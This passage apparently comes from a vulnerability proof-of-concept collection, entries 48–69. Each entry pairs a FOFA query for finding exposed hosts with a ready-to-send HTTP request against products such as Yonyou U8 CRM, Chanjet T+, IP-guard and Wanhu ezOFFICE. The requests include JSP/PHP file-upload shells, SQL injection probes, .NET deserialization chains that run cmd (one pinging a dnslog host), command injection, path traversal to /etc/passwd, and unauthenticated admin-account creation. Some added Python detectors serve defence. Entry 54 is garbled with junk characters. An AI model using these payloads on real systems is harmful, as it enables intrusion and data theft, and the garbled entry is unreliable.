User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

The DontCheckLogin=1 query parameter is what makes the endpoint reachable without a session.

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Then request:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

Note the trailing space in the file name ("%s.php "): it is kept as sent so that an extension check sees something other than .php while the file is still saved with that extension.

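The upload entries on this page (accept.jsp, grouptemplet, importhttpscer, swfupload.php, uploadfile.php) succeed through a handful of recurring tricks: a path in the file name, a separate form field that names the destination, a server-executable extension, and a trailing space after the extension. What follows is an added example, not code from the original post or from any vendor: a small multipart parser that keeps the file name exactly as sent (standard libraries tend to strip the trailing space) and a check that flags each of those tricks. The three sample bodies are copied from the accept.jsp, importhttpscer and uploadfile.php requests above, with CRLF line ends assumed; the extension list and function names are the example's own.

```python
"""Inspect multipart uploads for the tricks the requests above rely on.

Added example, not from the original post or any vendor.  Sample bodies are
reconstructed from the Yonyou requests on this page with CRLF line ends; the
extension list and helper names are this example's own.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

EXECUTABLE = {"jsp", "jspx", "php", "phtml", "asp", "aspx", "ashx"}
_PARAM_RE = re.compile(r'(\w+)="([^"]*)"')       # name="..." / filename="..."
_EXT_RE = re.compile(r"\.([A-Za-z0-9]+)$")

B24 = "---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc"
SAMPLE_ACCEPT_JSP = ("multipart/form-data; boundary=" + B24, "\r\n".join([
    "--" + B24,
    'Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"',
    "Content-Type: text/plain", "",
    '<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>',
    "--" + B24,
    'Content-Disposition: form-data; name="fname"', "",
    r"\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp",
    "--" + B24 + "--"]))
B35 = "fd28cb44e829ed1c197ec3bc71748df0"
SAMPLE_IMPORTHTTPSCER = ("multipart/form-data; boundary=" + B35, "\r\n".join([
    "--" + B35,
    'Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"', "",
    "<%out.println(1111*1111);%>",
    "--" + B35 + "--"]))
B49 = "---------------------------vvv3wdayqv3yppdxvn3w"
SAMPLE_UPLOADFILE = ("multipart/form-data; boundary=" + B49, "\r\n".join([
    "--" + B49,
    'Content-Disposition: form-data; name="file"; filename="%s.php "',
    "Content-Type: application/octet-stream", "",
    "wersqqmlumloqa",
    "--" + B49,
    'Content-Disposition: form-data; name="upload"', "",
    "upload",
    "--" + B49 + "--"]))


def parse_multipart(content_type: str, body: str) -> List[Dict[str, Optional[str]]]:
    """One dict per part: name, filename (None for plain fields) and data.
    The filename is returned verbatim, trailing space included."""
    m = re.search(r'boundary="?([^";\s]+)', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = "--" + m.group(1)
    parts: List[Dict[str, Optional[str]]] = []
    for chunk in body.replace("\r\n", "\n").split(delimiter)[1:]:
        if chunk.startswith("--"):               # closing delimiter
            break
        head, _, data = chunk.lstrip("\n").partition("\n\n")
        headers: Dict[str, str] = {}
        for line in head.split("\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        params = dict(_PARAM_RE.findall(headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "data": data[:-1] if data.endswith("\n") else data})
    return parts


def _extension(name: str) -> Optional[str]:
    """Extension after dropping the trailing spaces/dots a file system discards on save."""
    m = _EXT_RE.search(name.rstrip(" ."))
    return m.group(1).lower() if m else None


def inspect_upload(content_type: str, body: str) -> Set[Tuple[str, str]]:
    """(field, finding) pairs worth blocking or alerting on."""
    findings: Set[Tuple[str, str]] = set()
    for part in parse_multipart(content_type, body):
        field, fname, data = part["name"] or "?", part["filename"], part["data"] or ""
        if fname is not None:
            if fname != fname.rstrip(" ."):
                findings.add((field, "trailing-space"))        # "%s.php "
            if ".." in fname or "/" in fname or "\\" in fname:
                findings.add((field, "path-in-filename"))      # "./webapps/nc_web/1.jsp"
            if _extension(fname) in EXECUTABLE:
                findings.add((field, "executable-ext"))
        elif ("/" in data or "\\" in data) and _extension(data.strip()) in EXECUTABLE:
            findings.add((field, "path-in-field"))             # fname=\webapps\nc_web\x.jsp
        if "<%" in data or "<?php" in data.lower():
            findings.add((field, "script-body"))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_ACCEPT_JSP, SAMPLE_IMPORTHTTPSCER, SAMPLE_UPLOADFILE):
        print(sorted(inspect_upload(*sample)))
```

The accept.jsp body is the instructive one: the part that carries the file looks harmless (.txt), and only the fname field reveals the .jsp destination, so an upload filter that inspects the file part alone misses it.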
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

Error-based (MySQL): the XPath error raised by extractvalue echoes md5(123456) between ^ markers.

51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

Union-based: the UNION and SELECT keywords are wrapped in MySQL version comments (/*!50000...*/) to slip past keyword filters; the response contains md5(102103122) when the injection works.

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Only the path above is given for this entry; it is an encoded path traversal that reads /etc/passwd, not an upload request.

; [5 ?" L) a) S5 n' A, Y: g0 t54. 畅捷通T+ getstorewarehousebystore 远程代码执行
4 A* i2 x- l* qFOFA:app="畅捷通-TPlus"8 @, y W8 p ?' u3 N4 D& z; y
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
' m. M& x# I* n T% k$ {+ z"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"2 d# ?! `# j: z; A6 r+ w' e
9 Z# D7 B+ l' h4 j% E. E1 n
' l& H9 \ w% H完整数据包9 t. W1 W0 f0 T. A% _
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
3 r% F4 V& D: ?3 H1 G" c) _Host: x.x.x.x B' B: A% L1 ~
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
. K0 e# b l, u O, x5 m$ VContent-Length: 593. y9 C: O4 v N- v+ H" U6 _) v
" D: o) e9 o1 [. }9 ?/ H
{5 X; x$ H1 l( V. o4 o
"storeID":{
! _$ z. w( l" N/ k" O$ N, ~( I "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 P8 H$ E4 I. H4 @0 Z
"MethodName":"Start",% v* U! ?" Z3 R2 y! Z, L
"ObjectInstance":{
3 N2 o( d4 e9 z; p4 ]8 T "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" h$ ~$ h: g# D "StartInfo":{
8 [# f, _2 N4 F2 I! ` "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 \5 f2 Z" O8 T8 x3 v: U6 n "FileName":"cmd",4 D; j8 `$ t% `+ s& _
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: `. d! A; x+ ?6 r" A! j }
+ `; i0 a6 ~1 M }0 i7 Z% O" V) }2 Q! O
}
+ G* j2 g8 V) W, i9 y% z}; N( o" D* C3 u- _0 ? F! T% z
% E. W8 I9 Z$ A2 N. {7 C- ?5 U+ O- _" F; Z/ A7 f S
第二步,访问如下url
2 a6 }$ }7 f' G" V* }/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt! k1 |3 J7 a# A0 i' b1 L; u
2 x" x; y8 G' }$ l
/ J1 ^- V! l t( M( D
55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo": {
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
   }
  }
 }
}

Same gadget chain as entry 54 on a different AjaxPro endpoint; here the command is a ping to a dnslog host, so confirmation is the DNS query rather than a written file.
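The two Chanjet T+ requests (54 and 56) and the Dahua fastjson request (23) are the same class of bug seen from two runtimes: a JSON deserializer honours a type discriminator inside the document (__type for the .NET AjaxPro endpoints, @type for fastjson) and instantiates whatever class the client names. The T+ payloads chain System.Windows.Data.ObjectDataProvider to System.Diagnostics.Process so that deserialization itself runs cmd. What follows is an added example, not code from the original post or from Yonyou, Chanjet or Dahua: a Python scan that walks a JSON body for those discriminators, names the gadget class from a small table, and extracts the command line from a ProcessStartInfo. It falls back to a raw text scan because the fastjson probe is deliberately malformed JSON. The sample bodies are copied from the requests above; the class table and function names are the example's own.

```python
"""Flag client-controlled type discriminators in JSON request bodies.

Added example, not part of the original post or any vendor's code.  Sample
bodies are copied from the Chanjet T+ and Dahua requests on this page; the
gadget table and helper names are this example's own.
"""
import json
import re
from typing import Any, Dict, List

# Keys that polymorphic deserializers read to pick a class: fastjson autoType
# and the .NET JavaScriptSerializer / AjaxPro convention used by the T+ endpoints.
TYPE_KEYS = ("@type", "__type")

# Classes seen in the requests above, with what each gives an attacker.
GADGETS = {
    "java.net.URL": "DNS/HTTP callback (fastjson probe)",
    "com.alibaba.fastjson.JSONObject": "fastjson autoType wrapper",
    "System.Windows.Data.ObjectDataProvider": "calls a method on an arbitrary object",
    "System.Diagnostics.Process": "process start",
    "System.Diagnostics.ProcessStartInfo": "command line for the process start",
}
_RAW_TYPE_RE = re.compile(r'"(@type|__type)"\s*:\s*"([^"]+)"')

# Constructed from the page: entry 56 (valid JSON) and entry 23 (not valid JSON).
TPLUS_BODY = """{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
  "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
  }
 }
}
}"""
FASTJSON_BODY = '{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://DNSLOG"}}""}'


def _class_name(value: str) -> str:
    """'System.Diagnostics.Process, System, Version=...' -> 'System.Diagnostics.Process'."""
    return value.split(",", 1)[0].strip()


def _walk(node: Any, path: str, out: List[Dict[str, str]]) -> None:
    """Depth-first walk recording every type discriminator and any command line."""
    if isinstance(node, dict):
        for key in TYPE_KEYS:
            if isinstance(node.get(key), str):
                cls = _class_name(node[key])
                out.append({"path": path, "key": key, "value": cls,
                            "effect": GADGETS.get(cls, "unknown type")})
        if isinstance(node.get("FileName"), str) and "Arguments" in node:
            out.append({"path": path, "key": "command",
                        "value": f"{node['FileName']} {node['Arguments']}",
                        "effect": "command executed"})
        for key, child in node.items():
            _walk(child, f"{path}.{key}" if path else key, out)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            _walk(child, f"{path}[{i}]", out)


def scan_json_body(body: str) -> Dict[str, Any]:
    """Parse strictly when possible; otherwise scan the raw text, because the
    fastjson probe is malformed JSON that fastjson itself still accepts."""
    findings: List[Dict[str, str]] = []
    try:
        _walk(json.loads(body), "", findings)
        parsed = True
    except ValueError:                      # json.JSONDecodeError is a ValueError
        parsed = False
        for key, value in _RAW_TYPE_RE.findall(body):
            cls = _class_name(value)
            findings.append({"path": "?", "key": key, "value": cls,
                             "effect": GADGETS.get(cls, "unknown type")})
    return {"parsed": parsed,
            "suspicious": bool(findings),   # any client-chosen type is suspect
            "gadget": any(f["effect"] != "unknown type" for f in findings),
            "findings": findings}


if __name__ == "__main__":
    for body in (TPLUS_BODY, FASTJSON_BODY):
        print(json.dumps(scan_json_body(body), indent=1))
```

The useful property for detection is that the gadget chain is visible in the request as written: the three __type values and the cmd line are literal strings, so a reverse proxy or WAF rule that rejects any __type or @type key in a JSON body to these endpoints stops this class without needing a signature per command.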

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based: comparing 1 with the @@version string fails type conversion and the MSSQL error message echoes the server version.

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based, same mechanism as entry 39: the conversion error echoes 0xe10adc3949ba59abbe56e057f20f883e, the MD5 of 123456.

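Most of the injections on this page are confirmed the same way: a delay primitive chosen for the back end (MSSQL waitfor delay '0:0:5', Oracle DBMS_PIPE.RECEIVE_MESSAGE(...,5)) or an error primitive that echoes a value (MySQL extractvalue, the MSSQL hashbytes conversion trick, @@version), occasionally wrapped in base64 (importexport.php, entry 60 below) or in MySQL version comments (entry 52). What follows is an added example, not code from the original post or from any vendor: a Python check that URL-decodes a request target or body the way the application's form parser would, then names the dialect and technique it recognises, including the base64-wrapped statement. The request lines are copied from entries on this page; the signature table and function names are the example's own.

```python
"""Classify the SQL injection probes used on this page.

Added example, not part of the original post: decodes a request target or
body and names the database dialect and technique behind each probe.
Request lines in the test are copied from the entries above; the signature
table and function names are this example's own.
"""
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, unquote_plus

# (dialect, technique, pattern); patterns run on the decoded text.
SIGNATURES = [
    ("mssql", "time-based", re.compile(r"waitfor\s+delay\s*'\d+:\d+:\d+'", re.I)),
    ("oracle", "time-based", re.compile(r"dbms_pipe\.receive_message\s*\(", re.I)),
    ("mysql", "error-based", re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    ("mssql", "error-based", re.compile(r"\b(?:hashbytes|fn_sqlvarbasetostr|fn_varbintohexstr)\s*\(", re.I)),
    ("mssql", "version-probe", re.compile(r"@@version", re.I)),
    ("mysql", "comment-obfuscated-union", re.compile(r"/\*!\d{5}\s*(?:union|select)\b", re.I)),
]
_STATEMENT_RE = re.compile(r"^\s*(?:select|insert|update|delete|union|exec)\b", re.I)
_B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def normalise(text: str) -> str:
    """URL-decode repeatedly (at most three layers) so double encoding cannot
    hide a probe; '+' becomes a space, as the server's form parser makes it."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def decode_base64(value: str) -> Optional[str]:
    """The text a parameter decodes to if it is well-formed base64, else None."""
    if not _B64_RE.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def inspect_request(target: str, body: str = "") -> List[Dict[str, str]]:
    """Findings for one request: the target (path plus query) and an optional body."""
    findings: List[Dict[str, str]] = []
    for where, text in (("target", target), ("body", body)):
        if not text:
            continue
        decoded = normalise(text)
        for dialect, technique, pattern in SIGNATURES:
            m = pattern.search(decoded)
            if m:
                findings.append({"where": where, "dialect": dialect,
                                 "technique": technique, "match": m.group(0)})
    # A whole statement smuggled in base64 (importexport.php?sql=...).  Decode the
    # raw value with unquote(), not unquote_plus(): '+' is a base64 digit.
    for pair in target.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        statement = decode_base64(unquote(value))
        if statement and _STATEMENT_RE.match(statement):
            findings.append({"where": "target", "dialect": "any",
                             "technique": "base64-statement", "match": f"{name}={statement}"})
    return findings


if __name__ == "__main__":
    for f in inspect_request("/importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql"):
        print(f)
```

Two things the example makes concrete. First, the dialect of the delay primitive tells you which database the attacker believes is behind the endpoint (Yonyou NC ships on both MSSQL and Oracle, which is why both forms appear above), so a hit for the wrong dialect is noise rather than a confirmed injection. Second, time-based probes leave nothing in the response body; pairing this classifier with response times of about five seconds in the access log is what separates a blind attempt from a blind success.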
59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.07
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
 <sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
 </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the directory it is written to, and the fileType parameter gives the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
